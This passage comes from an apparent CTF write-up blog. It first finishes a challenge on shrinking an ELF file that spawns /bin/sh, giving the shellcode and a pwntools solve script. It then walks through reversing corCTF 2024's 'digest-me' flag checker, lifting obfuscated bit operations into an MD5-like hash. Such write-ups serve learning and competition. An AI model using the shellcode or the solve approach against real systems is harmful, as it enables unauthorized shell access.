Compile it and we get 18 bytes! (Please let me know if you can craft an even shorter x86 shellcode.) So with header overlay, we have a total of 130 bytes. Still need to reduce it by at least 10 bytes!
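The byte counts can be double-checked without an assembler by writing out the instruction encodings by hand. The hex strings below are my own hand-assembled encodings of the two listings (not output copied from the original build), so treat them as a sanity check.

```python
first = b"".join([
    bytes.fromhex("48bb2f62696e2f736800"),  # mov rbx, imm64 ("/bin/sh\0")
    bytes.fromhex("53"),                    # push rbx
    bytes.fromhex("4889e7"),                # mov rdi, rsp
    bytes.fromhex("b83b000000"),            # mov eax, 0x3b
    bytes.fromhex("0f05"),                  # syscall
])
second = b"".join([
    bytes.fromhex("48bb2f62696e2f736800"),  # mov rbx, imm64 ("/bin/sh\0")
    bytes.fromhex("53"),                    # push rbx
    bytes.fromhex("54"),                    # push rsp
    bytes.fromhex("5f"),                    # pop rdi
    bytes.fromhex("6a3b"),                  # push 0x3b
    bytes.fromhex("58"),                    # pop rax
    bytes.fromhex("0f05"),                  # syscall
])

HEADERS_WITH_OVERLAY = 112
print(len(first), len(second), HEADERS_WITH_OVERLAY + len(second))
```

The 10-byte mov with a 64-bit immediate dominates both variants, which is why trick 3 below goes after the string rather than the remaining instructions.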

(Side note: While writing this writeup, I realized that it might have been easier if I changed e_machine to be i386 so that the program header is smaller. )

Trick 2: Program header and `.text` overlay

Similar to the first trick, why don’t we try to overlay the program header and the .text section? After all, they are just bytes! This works up to 8 bytes – I removed the last 8 bytes from the program header (the p_align field) and directly appended the shellcode right after (+ adjusting e_entry). Apparently, neither the file parser nor the virtual address space cares about the segment alignment. If we go beyond 8 bytes – we are overwriting the p_memsz and that causes an error because there is simply not that much memory (as we will be writing the most significant byte of the p_memsz)!

122 bytes! 2 more to go!

Trick 3: Store data within the ELF header

At first, it seems a bit hopeless – to my knowledge, the x86 shellcode is optimized as much as possible and the effective size of the headers cannot be reduced further. However, I recalled from here that instructions can be placed inside the ELF header padding. Unfortunately, I couldn’t make that work with header overlay (it works without header overlay). But, in a similar way, I thought we could place the '/bin/sh' string there instead. And that worked by overwriting the 8th byte and the padding (8 bytes of data in total)! The final shellcode looks like:

; in ./sc.asm
mov rdi, 0x0400008 ; where /bin/sh is 
push 0x3b
pop rax
syscall

This works because PIE is not enabled (for more about PIE, see here).

114 bytes and flag! Ayyy!
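To recap how the three tricks add up, here is a small sketch of the byte budget. It assumes the standard ELF64 sizes (a 0x40-byte ELF header and a 0x38-byte program header), which match the offsets used in the solve script below; the helper name file_size is made up, and the final shellcode length of 10 bytes is inferred from the 114-byte total rather than measured.

```python
ELF_HEADER_SIZE = 0x40      # sizeof(Elf64_Ehdr)
PROGRAM_HEADER_SIZE = 0x38  # sizeof(Elf64_Phdr)

def file_size(shellcode_len, header_overlap=0, phdr_tail_cut=0):
    """Total file size for one ELF header, one program header and the shellcode."""
    headers = ELF_HEADER_SIZE + PROGRAM_HEADER_SIZE - header_overlap - phdr_tail_cut
    return headers + shellcode_len

# Trick 1: the program header overlaps the last 8 bytes of the ELF header
after_trick_1 = file_size(18, header_overlap=8)
# Trick 2: the shellcode replaces the last 8 bytes of the program header
after_trick_2 = file_size(18, header_overlap=8, phdr_tail_cut=8)
# Trick 3: '/bin/sh' moves into the ELF header, so the shellcode shrinks
# (10 bytes is inferred from the 114-byte total, not measured)
after_trick_3 = file_size(10, header_overlap=8, phdr_tail_cut=8)

print(after_trick_1, after_trick_2, after_trick_3)  # 130 122 114
```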

Solve script

from pwn import *
context.log_level = 'debug'
# io = remote('challs.tfcctf.com', 32501)
io = process('./santas_little_helper')

bs = bytearray()
with open('./base.bin', 'rb') as header: 
    arr = header.read()
    tmp = bytearray(arr[:0x40])
    tmp += arr[0x48:0x78-0x8] # trick 1 + trick 2: don't need the beginning and the end of the Ph (program header) for the overlays
    tmp[0x18] = len(tmp) # trick 2: change e_entry so that it's immediately after the Ph
    tmp[0x20] = 0x38 # trick 1: shifting the start of Ph by changing e_phoff 
    tmp[0x3c] = 0x5 # trick 1: change the end of the ELF header so that the overlay works
    bs += tmp

# from `nasm -f bin -o sc sc.asm`
with open('./sc', 'rb') as sc: # append the shellcode from above
    arr = sc.read()
    bs += arr 
    for i, b in enumerate(p64(0x0068732f6e69622f)): # trick 3
        bs[0x8 + i] = b

io.send(bytes(bs))

io.interactive()

[corCTF 2024] digest-me

2024-07-29T00:00:00+00:00

Having no solves yet in the rev category with one day remaining in corCTF 2024, I decided to have a gander at something that looked approachable. The two easiest challenges at the time by solve count were corMine: The Beginning and its sequel corMine 2: Revelations, which were games of some sort. However, I eventually gave up after 5+ minutes of trying to get the game to just run! But I guess I don’t feel so bad seeing as my teammates couldn’t figure it out either :’)

corMine refusing to run without a GPU smh

The next easiest one on the list was called digest-me, which is the topic of this post and what I poured most of my time into for the next 24 hours. Luckily, this one was a simple binary that asked you to input a flag, and told you whether it was correct. These kinds of programs are common enough in CTFs that they have earned a not-so-special name: flag checkers.

Challenge

The description gives us a few clues (perhaps it has something to do with hashing and bits?), but otherwise just contains the average lore.

FizzBuzz101 was innocently writing a new, top-secret compiler when his computer was Crowdstriked. Worse, the recovery key is behind a hasher that he wrote and compiled himself, and he can’t remember how the bits work! Can you help him get his life’s work back?

Here is a sample interaction from the digestme binary:

$ ./digestme
Welcome!
Please enter the flag here:
corctf{what}
Try again:
corctf{potatoes}
Try again:

It’s too big

One problem immediately came up when opening the program in Ghidra – it refused to decompile main()! Examining the disassembly to see what could possibly have gone wrong, I was horrified to witness a chain of about 300,000 instructions consisting solely of mov, and, or and xor:

Luckily, I worked around this by patching ret instructions near the top and bottom of main() to ensure Ghidra doesn’t try to decompile all of it. That allows us to finally see the start of the function.

Brute force?

Through a combination of static and dynamic analysis, I was able to constrain the flag to a set of preconditions that were enforced by those ifs:

len(flag) == 19
flag[:7] == "corctf{"
flag[8] == flag[17]
flag[9] == flag[11]
flag[7] == flag[16] + 1
flag[14] == flag[16] + 4

The short flag certainly raised my eyebrows about the possibility of brute force. There were 11 unknown bytes but 4 of those can be disregarded because of the extra constraints, for a total of 95^7 = 69,833,729,609,375 possible flags (assuming the flag is printable).

However, it’s worth noting that each run would require at least 300,000 instructions, so 2 days would not be nearly enough to find the flag in time on my poor 4-core Intel i5 laptop.

The rest of the program is focused on executing the said 300,000 instructions, which, judging by the disassembly, just seem to be a bunch of operations on an array A. A is initialized at the start via A = (byte *)calloc(1,100000), which allocates a zero-filled 100,000-byte array.

The flag is then loaded into A by converting each byte inside corctf{...} into 8 bits, and then storing those bits (one per array entry, most significant bit first) starting at offset A + 0x940. For those who speak Python, that looks something like this:

A[0x940:0x998] = [(c >> i) & 1 for c in flag[7:-1] for i in range(7, -1, -1)]

After the extremely long chain of array operations, the first 128 bits of A are converted into 4 32-bit integers (call them a, b, c, d). The flag checker outputs Nice! if c == 0x19c603ba and d == 0x14353ce4 (A.K.A. the target condition).

Reversing the elephant in the room

Now that it was clear how the program was checking the flag, I worked on parsing the long array operations into something more readable. Once we had the instructions in a higher-level language, it would be possible in theory to rely on z3 to recover the flag for us.

Instead of bashing Ghidra to decompile everything for us, I used capstone to parse the machine code into a clean disassembly:

from capstone import *

with open('digestme', 'rb') as f:
    binary = f.read()

code = binary[0x1290:0xed854]

cs = Cs(CS_ARCH_X86, CS_MODE_64)
instructions = cs.disasm(code, 0)

for inst in instructions:
    print(inst.mnemonic, inst.op_str)

After combing through the output, I was surprised to find only two distinct groups of instructions. It was either a simple mov in the form,

mov byte ptr [rax + X], Y

which maps to A[X] = Y, or

mov cl, byte ptr [rax + X]
<op> cl, byte ptr [rax + Y]
mov byte ptr [rax + Z], cl

which maps to A[Z] = A[X] <op> A[Y] where <op> ∈ [and, or, xor].

This made it relatively easy to decompile with a little bit of regex:

from capstone import *
import re

with open('digestme', 'rb') as f:
    binary = f.read()

OP_MAP = {'and': '&', 'or': '|', 'xor': '^'}

code = binary[0x1290:0xed854]

cs = Cs(CS_ARCH_X86, CS_MODE_64)
instructions = cs.disasm(code, 0)

commands = []

while (inst := next(instructions, None)) is not None:
    assert inst.mnemonic == 'mov'

    if m := re.fullmatch(r'byte ptr \[rax( \+ (\w+)|)\], ([01])', inst.op_str):
        out = int(m[2], 0) if m[2] else 0
        val = int(m[3])
        commands.append(f'A[{out:#x}] = {val}')
    else:
        m = re.fullmatch(r'cl, byte ptr \[rax( \+ (\w+)|)\]', inst.op_str)
        in1 = int(m[2], 0) if m[2] else 0

        inst = next(instructions)
        m = re.fullmatch(r'cl, byte ptr \[rax( \+ (\w+)|)\]', inst.op_str)
        in2 = int(m[2], 0) if m[2] else 0
        op = OP_MAP[inst.mnemonic]

        inst = next(instructions)
        m = re.fullmatch(r'byte ptr \[rax( \+ (\w+)|)\], cl', inst.op_str)
        out = int(m[2], 0) if m[2] else 0

        commands.append(f'A[{out:#x}] = A[{in1:#x}] {op} A[{in2:#x}]')

print(len(commands))

with open('commands.txt', 'w') as f:
    for cmd in commands:
        f.write(cmd + '\n')

I also printed out the number of commands, which came out at a respectable 60,180. Still far from being ideal of course.

Given the description of the challenge, I figured this was some hashing algorithm that was obfuscated by bit manipulations. Looking through the commands.txt file, I noticed that there was a lot of repetition. In fact, it almost always performed one of &, |, or ^ in 32-bit chunks like this:

A[0x0] = A[0xfa0] | A[0x100]
A[0x1] = A[0xfa1] | A[0x101]
A[0x2] = A[0xfa2] | A[0x102]
A[0x3] = A[0xfa3] | A[0x103]
...
A[0x1f] = A[0xfbf] | A[0x11f]

However, there were also certain chunks that had all the operators combined in a mixed order, which strangely always came in groups of 157 that repeated ^, ^, &, &, | cyclically.

A[0xe7] = A[0xc7] ^ A[0x27]
A[0xb40] = A[0xc7] & A[0x27]
A[0xb41] = A[0xc6] ^ A[0x26]
A[0xe6] = A[0xb41] ^ A[0xb40]
A[0xb40] = A[0xb41] & A[0xb40]
A[0xb41] = A[0xc6] & A[0x26]
A[0xb40] = A[0xb41] | A[0xb40]
A[0xb41] = A[0xc5] ^ A[0x25]
A[0xe5] = A[0xb41] ^ A[0xb40]
A[0xb40] = A[0xb41] & A[0xb40]
A[0xb41] = A[0xc5] & A[0x25]
A[0xb40] = A[0xb41] | A[0xb40]
A[0xb41] = A[0xc4] ^ A[0x24]
A[0xe4] = A[0xb41] ^ A[0xb40]
A[0xb40] = A[0xb41] & A[0xb40]

At first, this made me scratch my head as it did not seem to “fit” with the rest of the output. But then I realized that this obscure-looking block of code was actually implementing a 32-bit adder!
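To see why that block is an adder, here is a minimal sketch of a ripple-carry adder built from the same three operators. The function name ripple_add32 is made up, and the bits are kept in a plain least-significant-first list for simplicity, which is not the exact bit layout the binary uses.

```python
def ripple_add32(x, y):
    """Add two 32-bit integers using only ^, & and | on single bits.

    Returns the 32-bit sum and the number of bit operations used.
    """
    a = [(x >> i) & 1 for i in range(32)]  # a[0] is the least significant bit
    b = [(y >> i) & 1 for i in range(32)]
    out = [0] * 32

    # Half adder for bit 0: one ^ and one &
    out[0] = a[0] ^ b[0]
    carry = a[0] & b[0]
    ops = 2

    # Full adder for bits 1..31: the repeating ^, ^, &, &, | cycle
    for i in range(1, 32):
        t = a[i] ^ b[i]
        out[i] = t ^ carry    # sum bit
        carry = t & carry     # carry propagated through this bit
        t = a[i] & b[i]       # carry generated by this bit
        carry = t | carry
        ops += 5

    return sum(bit << i for i, bit in enumerate(out)), ops

total, ops = ripple_add32(0xffffffff, 1)
print(hex(total), ops)  # 0x0 157
```

The operation count works out to 2 + 31 * 5 = 157, which matches the size of the odd-looking groups, and the two scratch variables play the role of A[0xb40] (the carry) and A[0xb41] (the temporary).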

This finally made sense with the rest of the logic, and once I was certain that these were all indeed 32-bit operations implemented on bits, I quickly hacked together a second program to convert the 60,180 commands into a new set of commands performed on 32-bit integers:

import re

def MOV(cmd):
    m = re.fullmatch(r'A\[(\w+)\] = ([01])', cmd)
    if m is None:
        return None
    return int(m[1], 0), int(m[2])

def BITW(cmd):
    m = re.fullmatch(r'A\[(\w+)\] = A\[(\w+)\] ([\^|&]) A\[(\w+)\]', cmd)
    if m is None:
        return None
    return int(m[1], 0), m[3], int(m[2], 0), int(m[4], 0)

with open('commands.txt', 'r') as f:
    commands = list(map(str.rstrip, f))

ncommands = []

idx = 0
while idx < len(commands):
    cmd = commands[idx]
    if MOV(cmd):
        chunk = commands[idx:idx+32]
        outs, vals = zip(*[MOV(cmd) for cmd in chunk])
        assert outs == tuple(range(outs[0], outs[-1] - 1, -1)) and outs[-1] & 31 == 0
        val = 0
        for o, v in zip(outs, vals):
            i = o & 31
            val |= v << 8 * (i // 8) + 7 - (i % 8)
        ncommands.append(f'A[{outs[-1]>>5}] = {val:#x}')
        idx += 32
    elif BITW(cmd) and BITW(cmd)[1] == BITW(commands[idx + 1])[1]:
        chunk = commands[idx:idx+32]
        outs, ops, in1s, in2s = zip(*[BITW(cmd) for cmd in chunk])
        if outs[0] & 31 == 0:
            assert outs == tuple(range(outs[0], outs[-1] + 1)) and outs[0] & 31 == 0
            assert len(set(ops)) == 1
            assert in1s == tuple(range(in1s[0], in1s[-1] + 1)) and in1s[0] & 31 == 0
            assert in2s == tuple(range(in2s[0], in2s[-1] + 1)) and in2s[0] & 31 == 0
            ncommands.append(f'A[{outs[0]>>5}] = A[{in1s[0]>>5}] {ops[0]} A[{in2s[0]>>5}]')
        else:
            rotl = (outs.index(min(outs) + 7) + 1) & 31
            ncommands.append(f'A[{outs[0]>>5}] = rotl(A[{in1s[0]>>5}] {ops[0]} A[{in2s[0]>>5}], {rotl})')
            assert [in1s[24 - 8 * (i // 8) + (i % 8)] - min(in1s) == i for i in range(32)]
            assert [in2s[24 - 8 * (i // 8) + (i % 8)] - min(in2s) == i for i in range(32)]
        idx += 32
    else:
        chunk = commands[idx:idx+157]
        outs, ops, in1s, in2s = zip(*[BITW(cmd) for cmd in chunk])
        assert outs.count(0xb40) == 63 and outs.count(0xb41) == 62
        assert ops == ('^', '&') + ('^', '^', '&', '&', '|') * 31
        assert in1s.count(0xb40) == 0 and in1s.count(0xb41) == 93
        assert in2s.count(0xb40) == 93 and in2s.count(0xb41) == 0
        assert outs[33] & 31 == 0 and in1s[32] & 31 == 0 and in2s[32] & 31 == 0
        ncommands.append(f'A[{outs[33]>>5}] = A[{in1s[32]>>5}] + A[{in2s[32]>>5}]')
        idx += 157

print(len(ncommands))

with open('commands2.txt', 'w') as f:
    for cmd in ncommands:
        f.write(cmd + '\n')

There were some tricky implementation details like rotl() somehow being part of the logic, but in the end we are left with a much simpler program with “only” 865 lines:

A[9] = 0xffffffff
A[125] = 0x0
A[126] = 0x0
A[127] = 0x0
A[128] = 0x0
A[0] = A[125] | A[8]
A[1] = A[126] | A[8]
A[2] = A[127] | A[8]
A[3] = A[128] | A[8]
A[10] = 0xd76aa478
A[11] = 0xe8c7b756
A[12] = 0x242070db
A[13] = 0xc1bdceee
A[14] = 0xf57c0faf
A[15] = 0x4787c62a
A[16] = 0xa8304613
A[17] = 0xfd469501
A[18] = 0x698098d8
A[19] = 0x8b44f7af
A[20] = 0xffff5bb1
A[21] = 0x895cd7be
A[22] = 0x6b901122
A[23] = 0xfd987193
A[24] = 0xa679438e
A[25] = 0x49b40821
A[26] = 0xf61e2562
A[27] = 0xc040b340
A[28] = 0x265e5a51
A[29] = 0xe9b6c7aa
A[30] = 0xd62f105d
A[31] = 0x2441453
A[32] = 0xd8a1e681
A[33] = 0xe7d3fbc8
A[34] = 0x21e1cde6
A[35] = 0xc33707d6
A[36] = 0xf4d50d87
A[37] = 0x455a14ed
A[38] = 0xa9e3e905
A[39] = 0xfcefa3f8
A[40] = 0x676f02d9
A[41] = 0x8d2a4c8a
A[42] = 0xfffa3942
A[43] = 0x8771f681
A[44] = 0x6d9d6122
A[45] = 0xfde5380c
A[46] = 0xa4beea44
A[47] = 0x4bdecfa9
A[48] = 0xf6bb4b60
A[49] = 0xbebfbc70
A[50] = 0x289b7ec6
A[51] = 0xeaa127fa
A[52] = 0xd4ef3085
A[53] = 0x4881d05
A[54] = 0xd9d4d039
A[55] = 0xe6db99e5
A[56] = 0x1fa27cf8
A[57] = 0xc4ac5665
A[58] = 0xf4292244
A[59] = 0x432aff97
A[60] = 0xab9423a7
A[61] = 0xfc93a039
A[62] = 0x655b59c3
A[63] = 0x8f0ccc92
A[64] = 0xffeff47d
A[65] = 0x85845dd1
A[66] = 0x6fa87e4f
A[67] = 0xfe2ce6e0
A[68] = 0xa3014314
A[69] = 0x4e0811a1
A[70] = 0xf7537e82
A[71] = 0xbd3af235
A[72] = 0x2ad7d2bb
A[73] = 0xeb86d391
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[10]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[11]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[12]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[13]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[14]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[15]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[16]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[17]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[18]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[19]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[20]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[21]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[22]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[23]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[24]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[25]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[26]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[27]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[28]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[29]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[30]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[31]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[32]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[33]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[34]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[35]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[36]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[37]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[38]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[39]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[40]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[41]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[42]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
